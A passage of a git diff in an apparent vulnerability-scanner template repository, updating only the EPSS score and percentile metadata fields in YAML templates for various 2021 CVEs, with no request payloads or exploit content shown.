a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26084 cwe-id: CWE-917 - epss-score: 0.97457 - epss-percentile: 0.99929 + epss-score: 0.97173 + epss-percentile: 0.99736 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 13 diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 99d0721b9f..6821ea7c4b 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26085 cwe-id: CWE-425 - epss-score: 0.9661 - epss-percentile: 0.99455 + epss-score: 0.96595 + epss-percentile: 0.99482 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index cf7020a4e4..de1c9b4e5a 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26086 cwe-id: CWE-22 - epss-score: 0.94427 - epss-percentile: 0.98891 + epss-score: 0.68779 + epss-percentile: 0.97605 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 8c8849cb6f..e882973585 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26247 cwe-id: CWE-79 - epss-score: 0.00252 - epss-percentile: 0.62358 + epss-score: 0.00255 + epss-percentile: 0.63025 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index bc6c4713ba..4c86f4c810 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26295 cwe-id: CWE-502 - epss-score: 0.97456 - epss-percentile: 0.99928 + epss-score: 0.97445 + epss-percentile: 0.99933 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index 140b88e854..bbaadf61d3 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26475 cwe-id: CWE-79 - epss-score: 0.00156 - epss-percentile: 0.51402 + epss-score: 0.00175 + epss-percentile: 0.54421 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 367e83c8a4..bd958d8745 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26598 cwe-id: CWE-287 - epss-score: 0.00425 - epss-percentile: 0.71111 + epss-score: 0.00544 + epss-percentile: 0.74718 cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index ba3f7fb1bf..8a210d7800 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26702 cwe-id: CWE-79 - epss-score: 0.00156 - epss-percentile: 0.51402 + epss-score: 0.00175 + epss-percentile: 0.54421 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 8da4e9a6ad..8e758f0daf 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26710 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.40934 + epss-score: 0.00107 + epss-percentile: 0.42897 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 3ea563f107..a36afabc40 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26723 cwe-id: CWE-79 - epss-score: 0.06264 - epss-percentile: 0.9267 + epss-score: 0.07461 + epss-percentile: 0.93346 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 638d1b6eeb..382f3e1b95 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26812 cwe-id: CWE-79 - epss-score: 0.00837 - epss-percentile: 0.79912 + epss-score: 0.00633 + epss-percentile: 0.76684 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 8c3ec7fcd9..1c0a723740 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26855 cwe-id: CWE-918 - epss-score: 0.9751 - epss-percentile: 0.99969 + epss-score: 0.97499 + epss-percentile: 0.99971 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 02a1929e04..cacab48b50 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.02194 - epss-percentile: 0.88002 + epss-score: 0.02376 + epss-percentile: 0.88607 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index ff6b059eeb..3ddc4295d8 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27132 cwe-id: CWE-74 - epss-score: 0.03662 - epss-percentile: 0.9051 + epss-score: 0.03821 + epss-percentile: 0.90827 cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 4b57615c9a..76fe72566c 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40466 + epss-percentile: 0.4078 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 2ee3be43db..6539094681 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-27310 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40466 + epss-percentile: 0.4078 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 99c90f0c20..798841c36b 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27314 cwe-id: CWE-89 - epss-score: 0.30796 - epss-percentile: 0.96384 + epss-score: 0.43636 + epss-percentile: 0.96929 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index e69731e2fb..66bab24118 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27315 cwe-id: CWE-89 epss-score: 0.10777 - epss-percentile: 0.94338 + epss-percentile: 0.94436 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 369b3531ab..6f2a7e2738 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27316 cwe-id: CWE-89 epss-score: 0.10777 - epss-percentile: 0.94338 + epss-percentile: 0.94436 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index aa30b7c9dc..eaf4c239f4 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27319 cwe-id: CWE-89 epss-score: 0.10777 - epss-percentile: 0.94338 + epss-percentile: 0.94436 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 83bf28b5cf..516227ae2d 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27320 cwe-id: CWE-89 epss-score: 0.14008 - epss-percentile: 0.94957 + epss-percentile: 0.95036 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 381d356781..8469cfd78c 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-27330 cwe-id: CWE-79 - epss-score: 0.0031 - epss-percentile: 0.66185 + epss-score: 0.00379 + epss-percentile: 0.69808 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index eddc5dc5ab..3ccc4ac18d 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27358 cwe-id: CWE-306 - epss-score: 0.02345 - epss-percentile: 0.88377 + epss-score: 0.02163 + epss-percentile: 0.88066 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 69dd47543f..5603483f95 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27519 cwe-id: CWE-79 epss-score: 0.00189 - epss-percentile: 0.55657 + epss-percentile: 0.56143 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 426988e263..72e402161d 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.00189 - epss-percentile: 0.55657 + epss-percentile: 0.56143 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 12598f1e72..535c5f836a 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27561 cwe-id: CWE-78 - epss-score: 0.97493 - epss-percentile: 0.99958 + epss-score: 0.97455 + epss-percentile: 0.9994 cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 1e217d1a6c..0d23a51ab7 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27651 cwe-id: CWE-287 - epss-score: 0.03154 - epss-percentile: 0.89839 + epss-score: 0.03696 + epss-percentile: 0.90671 cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index e32163c677..2019e78497 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27670 cwe-id: CWE-918 - epss-score: 0.32169 - epss-percentile: 0.96438 + epss-score: 0.35076 + epss-percentile: 0.96616 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e917fc45fe..511a2b516f 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27850 cwe-id: CWE-502,CWE-200 - epss-score: 0.97402 + epss-score: 0.97379 epss-percentile: 0.99878 cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 0db18cbab7..b7e43fb37b 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27905 cwe-id: CWE-918 - epss-score: 0.9728 - epss-percentile: 0.99779 + epss-score: 0.97292 + epss-percentile: 0.99813 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 6a9ade1838..17464e5c45 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-27909 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38928 + epss-percentile: 0.3929 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index 28d5a548cf..ed6711ccc5 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-27931 cwe-id: CWE-611 - epss-score: 0.68126 - epss-percentile: 0.9753 + epss-score: 0.61505 + epss-percentile: 0.97426 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index 3f068794ef..4cf5c4cb77 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-28149 cwe-id: CWE-22 epss-score: 0.06892 - epss-percentile: 0.93035 + epss-percentile: 0.93134 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 460ebad7ed..00a087427a 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00339 - epss-percentile: 0.67725 + epss-percentile: 0.68081 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 9d42e5213f..9b0e5f2fce 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-28151 cwe-id: CWE-78 - epss-score: 0.97079 - epss-percentile: 0.99662 + epss-score: 0.97091 + epss-percentile: 0.99692 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 802b0581a2..e694f479cf 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-28164 cwe-id: CWE-200 epss-score: 0.02064 - epss-percentile: 0.87606 + epss-percentile: 0.87759 cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 79e008577d..58b9eb9215 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-28169 cwe-id: CWE-200 epss-score: 0.00116 - epss-percentile: 0.44634 + epss-percentile: 0.45019 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 4c090d416e..e98deeae39 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00158 - epss-percentile: 0.51652 + epss-percentile: 0.52033 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 8679d0e00b..4d983c8e25 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 - epss-percentile: 0.9541 + epss-percentile: 0.95483 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index a25902df3e..1377f5a55c 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28918 cwe-id: CWE-704 epss-score: 0.02788 - epss-percentile: 0.89291 + epss-percentile: 0.89449 cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 1c7939eb7d..2f9009866d 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-28937 cwe-id: CWE-312 epss-score: 0.03352 - epss-percentile: 0.90136 + epss-percentile: 0.9027 cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index d7b3bc6058..05f828f28d 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29156 cwe-id: CWE-74 - epss-score: 0.42881 - epss-percentile: 0.96852 + epss-score: 0.42752 + epss-percentile: 0.96901 cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 0fb241a132..c55dece56e 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29203 cwe-id: CWE-306 epss-score: 0.95703 - epss-percentile: 0.99168 + epss-percentile: 0.99211 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 35f536ad0b..18f3e82e97 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -25,7 +25,7 @@ info: cve-id: CVE-2021-29441 cwe-id: CWE-290 epss-score: 0.96644 - epss-percentile: 0.9947 + epss-percentile: 0.99501 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index daae5bdf0e..36fd9d8b04 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-29442 cwe-id: CWE-306 epss-score: 0.96994 - epss-percentile: 0.99621 + epss-percentile: 0.99644 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index ca9ec3869e..fcaaabd6db 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29484 cwe-id: CWE-79 epss-score: 0.01083 - epss-percentile: 0.82494 + epss-percentile: 0.82667 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index bba755cc71..a6320b7481 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29490 cwe-id: CWE-918 epss-score: 0.00137 - epss-percentile: 0.48378 + epss-percentile: 0.48726 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index b6af5b8aab..e6c82f00c5 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-29505 cwe-id: CWE-502 epss-score: 0.02373 - epss-percentile: 0.88448 + epss-percentile: 0.88601 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index e096903fee..e64cfb491a 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29622 cwe-id: CWE-601 epss-score: 0.00225 - epss-percentile: 0.60091 + epss-percentile: 0.60493 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 9d29bca843..5e298f2e9c 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29625 cwe-id: CWE-79 epss-score: 0.00212 - epss-percentile: 0.58458 + epss-percentile: 0.58861 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 23a0794799..26565e5909 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3002 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.47974 + epss-score: 0.00143 + epss-percentile: 0.49878 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 728d92892d..2a9b666941 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-30049 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40864 + epss-percentile: 0.41167 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index db9b142c38..80efb634ee 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-30128 cwe-id: CWE-502 epss-score: 0.18312 - epss-percentile: 0.95512 + epss-percentile: 0.95591 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 871c1ec18c..6ba2d683a3 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-30134 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29353 cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 33f8fb0c06..cfbad0fc72 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-30151 cwe-id: CWE-79 epss-score: 0.00435 - epss-percentile: 0.71462 + epss-percentile: 0.71764 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index d2d6df41dc..1f9db03a0e 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3017 epss-score: 0.0151 - epss-percentile: 0.85325 + epss-percentile: 0.85475 cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff 